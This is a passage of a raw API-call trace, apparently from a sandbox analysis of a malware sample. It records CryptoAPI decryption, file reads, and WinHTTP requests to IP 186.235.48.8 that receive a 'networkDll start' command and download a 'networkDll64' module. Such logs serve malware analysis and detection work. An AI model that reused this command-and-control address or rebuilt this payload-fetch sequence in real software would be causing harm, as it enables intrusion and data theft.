dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.104] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x2, pbData=0x32e7d0a0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d0a0, pdwDataLen=0xce51c) returned 1 [0188.104] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.104] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32e7d460, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d460, pdwDataLen=0xce51c) returned 1 [0188.104] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.104] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e7d4c0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d4c0, pdwDataLen=0xce51c) returned 1 [0188.104] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.104] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x2, pbData=0x32e7d0d0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d0d0, pdwDataLen=0xce51c) returned 1 [0188.104] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.104] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e7d8e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d8e0, pdwDataLen=0xce51c) returned 1 [0188.104] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.135] CryptSetKeyParam (hKey=0x3396f740, dwParam=0x4, pbData=0xce574*=0x1, dwFlags=0x0) returned 1 [0188.135] CryptSetKeyParam (hKey=0x3396f740, dwParam=0x1, pbData=0x32e7f230, dwFlags=0x0) returned 1 [0188.135] CryptDecrypt (in: hKey=0x3396f740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32349570, pdwDataLen=0xce55c | out: pbData=0x32349570, pdwDataLen=0xce55c) returned 0 [0188.135] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0188.135] CryptDestroyKey (hKey=0x3396f740) returned 0 [0188.135] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32349570 | out: hHeap=0x2150000) returned 1 [0188.135] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e7f230 | out: hHeap=0x2150000) returned 1 [0188.135] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e7d220 | out: hHeap=0x2150000) returned 1 [0188.135] CloseHandle (hObject=0x640) returned 1 [0188.135] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32348160 | out: hHeap=0x2150000) returned 1 [0188.135] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3204e010 | out: hHeap=0x2150000) returned 1 [0188.136] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0188.136] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e806f0 | out: hHeap=0x2150000) returned 1 [0188.136] PathFindFileNameW (pszPath="C:\\Windows\\system32\\EN\\fhuxpresentation.Resources.dll") returned="fhuxpresentation.Resources.dll" [0188.136] GetFullPathNameW (in: lpFileName="EN\\fhuxpresentation.Resources.dll", nBufferLength=0x105, lpBuffer=0x32e806f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\fhuxpresentation.Resources.dll", lpFilePart=0x0) returned 0x35 [0188.136] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\fhuxpresentation.Resources.dll" (normalized: "c:\\windows\\system32\\en\\fhuxpresentation.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x640 [0188.136] GetFileTime (in: hFile=0x640, lpCreationTime=0xceb38, lpLastAccessTime=0xceb30, lpLastWriteTime=0xceb28 | out: lpCreationTime=0xceb38*(dwLowDateTime=0x9c3db3ca, dwHighDateTime=0x1d112f1), lpLastAccessTime=0xceb30*(dwLowDateTime=0x9c3db3ca, dwHighDateTime=0x1d112f1), lpLastWriteTime=0xceb28*(dwLowDateTime=0x9c3db3ca, dwHighDateTime=0x1d112f1)) returned 1 [0188.136] CloseHandle (hObject=0x640) returned 1 [0188.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xceb58 | out: lpSystemTimeAsFileTime=0xceb58*(dwLowDateTime=0xfca6dfef, dwHighDateTime=0x1d7b3c9)) [0188.136] GetFullPathNameW (in: lpFileName="EN\\fhuxpresentation.Resources.dll", nBufferLength=0x105, lpBuffer=0x3204e010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\fhuxpresentation.Resources.dll", lpFilePart=0x0) returned 0x35 [0188.136] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\fhuxpresentation.Resources.dll" (normalized: "c:\\windows\\system32\\en\\fhuxpresentation.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0188.136] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3ec00 [0188.136] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.137] ReadFile (in: hFile=0x640, lpBuffer=0x32ac5770, nNumberOfBytesToRead=0x3ec00, lpNumberOfBytesRead=0xce6a4, lpOverlapped=0x0 | out: lpBuffer=0x32ac5770*, lpNumberOfBytesRead=0xce6a4*=0x3ec00, lpOverlapped=0x0) returned 1 [0188.154] CryptSetKeyParam (hKey=0x3396ebe0, dwParam=0x4, pbData=0xce574*=0x1, dwFlags=0x0) returned 1 [0188.154] CryptSetKeyParam (hKey=0x3396ebe0, dwParam=0x1, pbData=0x32e79650, dwFlags=0x0) returned 1 [0188.156] CryptDecrypt (in: hKey=0x3396ebe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32b04380, pdwDataLen=0xce55c | out: pbData=0x32b04380, pdwDataLen=0xce55c) returned 0 [0188.156] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0188.156] CryptDestroyKey (hKey=0x3396ebe0) returned 0 [0188.156] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32b04380 | out: hHeap=0x2150000) returned 1 [0188.164] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0188.164] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.164] CloseHandle (hObject=0x640) returned 1 [0188.164] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ac5770 | out: hHeap=0x2150000) returned 1 [0188.167] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3204e010 | out: hHeap=0x2150000) returned 1 [0188.167] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0188.167] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e806f0 | out: hHeap=0x2150000) returned 1 [0188.167] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65a90 | out: hHeap=0x2150000) returned 1 [0188.167] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44310 | out: hHeap=0x2150000) returned 1 [0188.167] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803c00 | out: hHeap=0x2150000) returned 1 [0188.167] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4ffd0 | out: hHeap=0x2150000) returned 1 [0188.167] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ab0 | out: hHeap=0x2150000) returned 1 [0188.167] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0188.167] GetTickCount () returned 0xec1eb2 [0188.167] WinHttpCloseHandle (hInternet=0x3396e250) returned 1 [0188.168] WinHttpOpenRequest (hConnect=0x728fa0, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/1/1ZL1TvNZPZJdTHNBXHB/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396aa10 [0188.168] WinHttpSetOption (hInternet=0x3396aa10, dwOption=0x1f, lpBuffer=0xce1c8, dwBufferLength=0x4) returned 1 [0188.168] WinHttpSendRequest (hRequest=0x3396aa10, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0188.873] WinHttpReceiveResponse (hRequest=0x3396aa10, lpReserved=0x0) returned 1 [0188.873] WinHttpQueryHeaders (in: hRequest=0x3396aa10, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xce1c4, lpdwBufferLength=0xce1cc, lpdwIndex=0x0 | out: lpBuffer=0xce1c4*, lpdwBufferLength=0xce1cc*=0x4, lpdwIndex=0x0) returned 1 [0188.873] WinHttpQueryDataAvailable (in: hRequest=0x3396aa10, lpdwNumberOfBytesAvailable=0xce2a0 | out: lpdwNumberOfBytesAvailable=0xce2a0*=0x77) returned 1 [0188.873] WinHttpReadData (in: hRequest=0x3396aa10, lpBuffer=0x3204ef30, dwNumberOfBytesToRead=0x77, lpdwNumberOfBytesRead=0xce2a4 | out: lpBuffer=0x3204ef30*, lpdwNumberOfBytesRead=0xce2a4*=0x77) returned 1 [0188.874] WinHttpQueryDataAvailable (in: hRequest=0x3396aa10, lpdwNumberOfBytesAvailable=0xce2a0 | out: lpdwNumberOfBytesAvailable=0xce2a0*=0x0) returned 1 [0188.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3204ef30, cbMultiByte=119, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 119 [0188.874] StrStrIW (lpFirst="/62/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/1ZL1TvNZPZJdTHNBXHB/1381892/\r\nnetworkDll start\r\n1234567890", lpSrch="/") returned="/62/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/1ZL1TvNZPZJdTHNBXHB/1381892/\r\nnetworkDll start\r\n1234567890" [0188.874] StrStrIW (lpFirst="62/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/1ZL1TvNZPZJdTHNBXHB/1381892/\r\nnetworkDll start\r\n1234567890", lpSrch="/") returned="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/1ZL1TvNZPZJdTHNBXHB/1381892/\r\nnetworkDll start\r\n1234567890" [0188.874] StrStrIW (lpFirst="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/1ZL1TvNZPZJdTHNBXHB/1381892/\r\nnetworkDll start\r\n1234567890", lpSrch="/") returned="/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/1ZL1TvNZPZJdTHNBXHB/1381892/\r\nnetworkDll start\r\n1234567890" [0188.874] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e80d30, Size=0x10) returned 0x32e81090 [0188.874] StrStrIW (lpFirst="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/1ZL1TvNZPZJdTHNBXHB/1381892/\r\nnetworkDll start\r\n1234567890", lpSrch="/") returned="/1ZL1TvNZPZJdTHNBXHB/1381892/\r\nnetworkDll start\r\n1234567890" [0188.874] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e81090, Size=0x20) returned 0x32e80460 [0188.874] StrStrIW (lpFirst="1ZL1TvNZPZJdTHNBXHB/1381892/\r\nnetworkDll start\r\n1234567890", lpSrch="/") returned="/1381892/\r\nnetworkDll start\r\n1234567890" [0188.877] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e80460, Size=0x20) returned 0x32e79650 [0188.877] StrStrIW (lpFirst="1381892/\r\nnetworkDll start\r\n1234567890", lpSrch="/") returned="/\r\nnetworkDll start\r\n1234567890" [0188.877] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e79650, Size=0x30) returned 0x32e65230 [0188.877] StrStrIW (lpFirst="\r\nnetworkDll start\r\n1234567890", lpSrch="/") returned 0x0 [0188.877] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e65230, Size=0x30) returned 0x32e64bf0 [0188.877] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41900 | out: hHeap=0x2150000) returned 1 [0188.877] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49f20 | out: hHeap=0x2150000) returned 1 [0188.877] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4ff50 | out: hHeap=0x2150000) returned 1 [0188.878] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e407f0 | out: hHeap=0x2150000) returned 1 [0188.878] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f7b0 | out: hHeap=0x2150000) returned 1 [0188.878] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f420 | out: hHeap=0x2150000) returned 1 [0188.878] StrStrIW (lpFirst="\r\nnetworkDll start\r\n1234567890", lpSrch="\r\n") returned="\r\nnetworkDll start\r\n1234567890" [0188.878] StrStrIW (lpFirst="networkDll start\r\n1234567890", lpSrch="\r\n") returned="\r\n1234567890" [0188.878] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80e30 [0188.878] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65130 [0188.878] StrStrIW (lpFirst="1234567890", lpSrch="\r\n") returned 0x0 [0188.878] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e80e30, Size=0x10) returned 0x32e80fb0 [0188.878] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79410 [0188.878] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80fb0 | out: hHeap=0x2150000) returned 1 [0188.878] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32747620 | out: hHeap=0x2150000) returned 1 [0188.878] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0188.878] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3204ef30 | out: hHeap=0x2150000) returned 1 [0188.878] lstrcmpW (lpString1="1381892", lpString2="HDLBFZFXPDDFJFT") returned -1 [0188.878] StrStrIW (lpFirst="networkDll start", lpSrch=" ") returned=" start" [0188.878] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80f50 [0188.878] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79a70 [0188.878] StrStrIW (lpFirst="start", lpSrch=" ") returned 0x0 [0188.878] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e80f50, Size=0x10) returned 0x32e80f70 [0188.878] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80fb0 [0188.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="start", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0188.878] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80ef0 [0188.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="start", cchWideChar=-1, lpMultiByteStr=0x32e80ef0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="start", lpUsedDefaultChar=0x0) returned 6 [0188.878] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e795c0 [0188.878] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e795c0 | out: hHeap=0x2150000) returned 1 [0188.878] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79530 [0188.879] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79530 | out: hHeap=0x2150000) returned 1 [0188.879] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79aa0 [0188.879] WinHttpConnect (hSession=0x71b780, pswzServerName="186.235.48.8", nServerPort=0x1bb, dwReserved=0x0) returned 0x338c9ff0 [0188.879] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79530 [0188.879] GetTickCount () returned 0xec2171 [0188.879] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] GetTickCount () returned 0xec2171 [0188.879] WinHttpOpenRequest (hConnect=0x338c9ff0, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/5/networkDll64/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396bcd0 [0188.879] WinHttpSetOption (hInternet=0x3396bcd0, dwOption=0x1f, lpBuffer=0xcd788, dwBufferLength=0x4) returned 1 [0188.879] WinHttpSendRequest (hRequest=0x3396bcd0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0189.499] WinHttpReceiveResponse (hRequest=0x3396bcd0, lpReserved=0x0) returned 1 [0189.499] WinHttpQueryHeaders (in: hRequest=0x3396bcd0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xcd784, lpdwBufferLength=0xcd78c, lpdwIndex=0x0 | out: lpBuffer=0xcd784*, lpdwBufferLength=0xcd78c*=0x4, lpdwIndex=0x0) returned 1 [0189.499] WinHttpQueryDataAvailable (in: hRequest=0x3396bcd0, lpdwNumberOfBytesAvailable=0xcd860 | out: lpdwNumberOfBytesAvailable=0xcd860*=0xed0) returned 1 [0189.499] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xed0) returned 0x32348160 [0189.500] WinHttpReadData (in: hRequest=0x3396bcd0, lpBuffer=0x32348160, dwNumberOfBytesToRead=0xed0, lpdwNumberOfBytesRead=0xcd864 | out: lpBuffer=0x32348160*, lpdwNumberOfBytesRead=0xcd864*=0xed0) returned 1 [0189.500] WinHttpQueryDataAvailable (in: hRequest=0x3396bcd0, lpdwNumberOfBytesAvailable=0xcd860 | out: lpdwNumberOfBytesAvailable=0xcd860*=0x2000) returned 1 [0189.500] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32348160, Size=0x2ed0) returned 0x32348160 [0189.500] WinHttpReadData (in: hRequest=0x3396bcd0, lpBuffer=0x32349030, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd864 | out: lpBuffer=0x32349030*, lpdwNumberOfBytesRead=0xcd864*=0x2000) returned 1 [0189.500] WinHttpQueryDataAvailable (in: hRequest=0x3396bcd0, lpdwNumberOfBytesAvailable=0xcd860 | out: lpdwNumberOfBytesAvailable=0xcd860*=0x1030) returned 1 [0189.503] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32348160, Size=0x3f00) returned 0x32e8a230 [0189.503] WinHttpReadData (in: hRequest=0x3396bcd0, lpBuffer=0x32e8d100, dwNumberOfBytesToRead=0x1030, lpdwNumberOfBytesRead=0xcd864 | out: lpBuffer=0x32e8d100*, lpdwNumberOfBytesRead=0xcd864*=0x1030) returned 1 [0189.503] WinHttpQueryDataAvailable (in: hRequest=0x3396bcd0, lpdwNumberOfBytesAvailable=0xcd860 | out: lpdwNumberOfBytesAvailable=0xcd860*=0x2000) returned 1 [0189.503] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e8a230, Size=0x5f00) returned 0x32ac5770 [0189.505] WinHttpReadData (in: hRequest=0x3396bcd0, lpBuffer=0x32ac9670, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd864 | out: lpBuffer=0x32ac9670*, lpdwNumberOfBytesRead=0xcd864*=0x2000) returned 1 [0189.505] WinHttpQueryDataAvailable (in: hRequest=0x3396bcd0, lpdwNumberOfBytesAvailable=0xcd860 | out: lpdwNumberOfBytesAvailable=0xcd860*=0x1450) returned 1 [0189.505] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x7350) returned 0x32ac5770 [0189.505] WinHttpReadData (in: hRequest=0x3396bcd0, lpBuffer=0x32acb670, dwNumberOfBytesToRead=0x1450, lpdwNumberOfBytesRead=0xcd864 | out: lpBuffer=0x32acb670*, lpdwNumberOfBytesRead=0xcd864*=0x1450) returned 1 [0189.505] WinHttpQueryDataAvailable (in: hRequest=0x3396bcd0, lpdwNumberOfBytesAvailable=0xcd860 | out: lpdwNumberOfBytesAvailable=0xcd860*=0x0) returned 1 [0189.506] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x140) returned 0x32e5c8d0 [0189.506] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32348160 [0189.506] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821dd0) returned 1 [0189.506] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.506] CryptHashData (hHash=0x3396eb70, pbData=0x32348160, dwDataLen=0x20, dwFlags=0x0) returned 1 [0189.506] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.506] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.506] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32e79650, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e79650, pdwDataLen=0xce12c) returned 1 [0189.506] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0189.506] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0189.506] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338223d0) returned 1 [0189.520] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.520] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x40, dwFlags=0x0) returned 1 [0189.520] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.520] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.520] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32e79560, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e79560, pdwDataLen=0xce12c) returned 1 [0189.520] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0189.520] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0189.520] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338223d0) returned 1 [0189.521] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.521] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x60, dwFlags=0x0) returned 1 [0189.521] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e795c0 [0189.521] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32e795c0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e795c0, pdwDataLen=0xce12c) returned 1 [0189.521] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.521] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0189.521] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822fd0) returned 1 [0189.522] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.522] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x80, dwFlags=0x0) returned 1 [0189.522] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.522] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.522] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32e79710, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e79710, pdwDataLen=0xce12c) returned 1 [0189.522] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0189.522] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0189.522] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338226d0) returned 1 [0189.523] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.523] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0189.523] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.523] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79770 [0189.523] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32e79770, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e79770, pdwDataLen=0xce12c) returned 1 [0189.523] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.523] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0189.523] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338233d0) returned 1 [0189.523] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) 